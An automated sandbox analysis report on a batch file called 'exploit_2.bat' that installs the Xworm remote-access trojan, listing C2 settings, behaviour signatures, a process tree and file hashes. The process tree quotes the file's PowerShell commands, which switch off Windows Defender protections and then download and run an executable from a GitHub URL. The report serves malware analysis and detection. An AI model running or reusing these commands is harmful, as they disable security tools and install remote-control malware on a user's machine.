
Analysis

  • max time kernel
    1800s
  • max time network
    1685s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags
    arch:x64, arch:x86, image:win10ltsc2021-20250217-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    01/03/2025, 19:55

General

  • Target

    https://cdn.discordapp.com/attachments/1345482930600018010/1345484285460742255/exploit_2.bat?ex=67c4b763&is=67c365e3&hm=06eab45726494c005f7f778a126193c180656c8923b4b0b78d31113e74d0e4af&

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:32672

except-blessed.gl.at.ply.gg:32672

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 5 IoCs
  • Executes dropped EXE 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1345482930600018010/1345484285460742255/exploit_2.bat?ex=67c4b763&is=67c365e3&hm=06eab45726494c005f7f778a126193c180656c8923b4b0b78d31113e74d0e4af&
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:456
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe437c46f8,0x7ffe437c4708,0x7ffe437c4718
        2⤵
        PID:3772
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
        2⤵
        PID:4708
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:628
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
        2⤵
        PID:1028
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
        2⤵
        PID:2572
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
        2⤵
        PID:1104
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8
        2⤵
        PID:1044
      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:920
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5744 /prefetch:8
        2⤵
        PID:4392
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
        2⤵
        PID:4312
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
        2⤵
        PID:816
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
        2⤵
        PID:3460
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1
        2⤵
        PID:4036
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
        2⤵
        PID:64
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:8
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4212
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
        2⤵
        PID:400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4244
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1488
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Suspicious behavior: EnumeratesProcesses
            PID:1752
          • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
            "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
            3⤵
            • Executes dropped EXE
            PID:1952
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
        2⤵
        PID:2864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4516
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2140
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:848
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Suspicious behavior: EnumeratesProcesses
            PID:3556
          • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
            "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
            3⤵
            • Executes dropped EXE
            PID:3860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
        2⤵
        PID:4752
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2432
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:3792
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Suspicious behavior: EnumeratesProcesses
            PID:4532
          • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
            "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
            3⤵
            • Executes dropped EXE
            PID:4528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
        2⤵
        PID:2136
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4388
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:3628
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1752
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Suspicious behavior: EnumeratesProcesses
            PID:1820
          • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
            "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
            3⤵
            • Executes dropped EXE
            PID:3768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
        2⤵
        PID:4904
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1636
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2160
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Set-MpPreference -DisableScriptScanning $true"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:3764
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            PID:3628
          • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
            "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
            3⤵
            • Executes dropped EXE
            PID:4532
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4520 /prefetch:2
        2⤵
        PID:4528
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2136
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:1944

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            3KB

                                            MD5

                                            3eb3833f769dd890afc295b977eab4b4

                                            SHA1

                                            e857649b037939602c72ad003e5d3698695f436f

                                            SHA256

                                            c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                                            SHA512

                                            c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                            Filesize

                                            152B

                                            MD5

                                            7fb0955b2f0e94f2388484f98deb88f4

                                            SHA1

                                            ab2363d95af3445a00981e78e6b6f0b860aade14

                                            SHA256

                                            a7c4cb739d577bfc41583a2dbf6e94ae41741c4529fe2d0443cd1dabefef8d15

                                            SHA512

                                            c9b6b6de78fb78c11b88860cd6c922d11717f5cf7477f602f197531aea114270c2b7111f66d96f60c3a9317fbf203fd26222e81d2d0eb70ad6515f5af1277edf

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                            Filesize

                                            111B

                                            MD5

                                            285252a2f6327d41eab203dc2f402c67

                                            SHA1

                                            acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                            SHA256

                                            5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                            SHA512

                                            11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                            Filesize

                                            186B

                                            MD5

                                            094ab275342c45551894b7940ae9ad0d

                                            SHA1

                                            2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                            SHA256

                                            ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                            SHA512

                                            19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            5KB

                                            MD5

                                            826e229eed191b416df8cc3122551d7b

                                            SHA1

                                            f0b840ca98df7911ad4049df0e1882b3580f7810

                                            SHA256

                                            62c9aca87aa22e3c9214751c67df539877d1dc2ce2ca9325a283a6b135c75cb1

                                            SHA512

                                            f97b6a23aa758a920c9b413c78603f06b879a2bb22db74c133b6872db0661323af26e114b700fd9a40c02b9d8ac0d80a919dcd21eaa08eb9c7bd8b41aaf396d0

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            5KB

                                            MD5

                                            491d64dd4b39898c804efcc61f9914f5

                                            SHA1

                                            81fa436ffa6117f5d77629a529697125bbe13b5c

                                            SHA256

                                            125217ba1ec5a67ba52977a379821a028697cc888e7f16be17bebabe9ad3ccc0

                                            SHA512

                                            41008cec8ad8e27705d42f6f5ae32ba8a99fb2d42e87db5c0c6a6b0adc7ae2ae75d2939b12c473c70f1c0cdf37ca6f40a8360d1714f18ecfa3908ea9150979fd

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                            Filesize

                                            24KB

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT (Filesize 16B)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (Filesize 10KB)

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (Filesize 1KB; 18 separate entries for this path, one per PowerShell start-up)

• C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe (Filesize 63KB)

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c1nlwsn4.kjc.ps1 (Filesize 60B)

• C:\Users\Admin\Downloads\Unconfirmed 742044.crdownload (Filesize 40KB)

• memory/1752-340-0x0000022EE01B0000-0x0000022EE02FF000-memory.dmp (Filesize 1.3MB)

• memory/1820-353-0x0000024325930000-0x0000024325A7F000-memory.dmp (Filesize 1.3MB)

• memory/1952-157-0x0000000000A70000-0x0000000000A86000-memory.dmp (Filesize 88KB)

• memory/2864-109-0x0000016E7CD50000-0x0000016E7CD72000-memory.dmp (Filesize 136KB)

• memory/3628-301-0x0000012C66840000-0x0000012C6698F000-memory.dmp (Filesize 1.3MB)

• memory/4388-289-0x0000016341B80000-0x0000016341CCF000-memory.dmp (Filesize 1.3MB)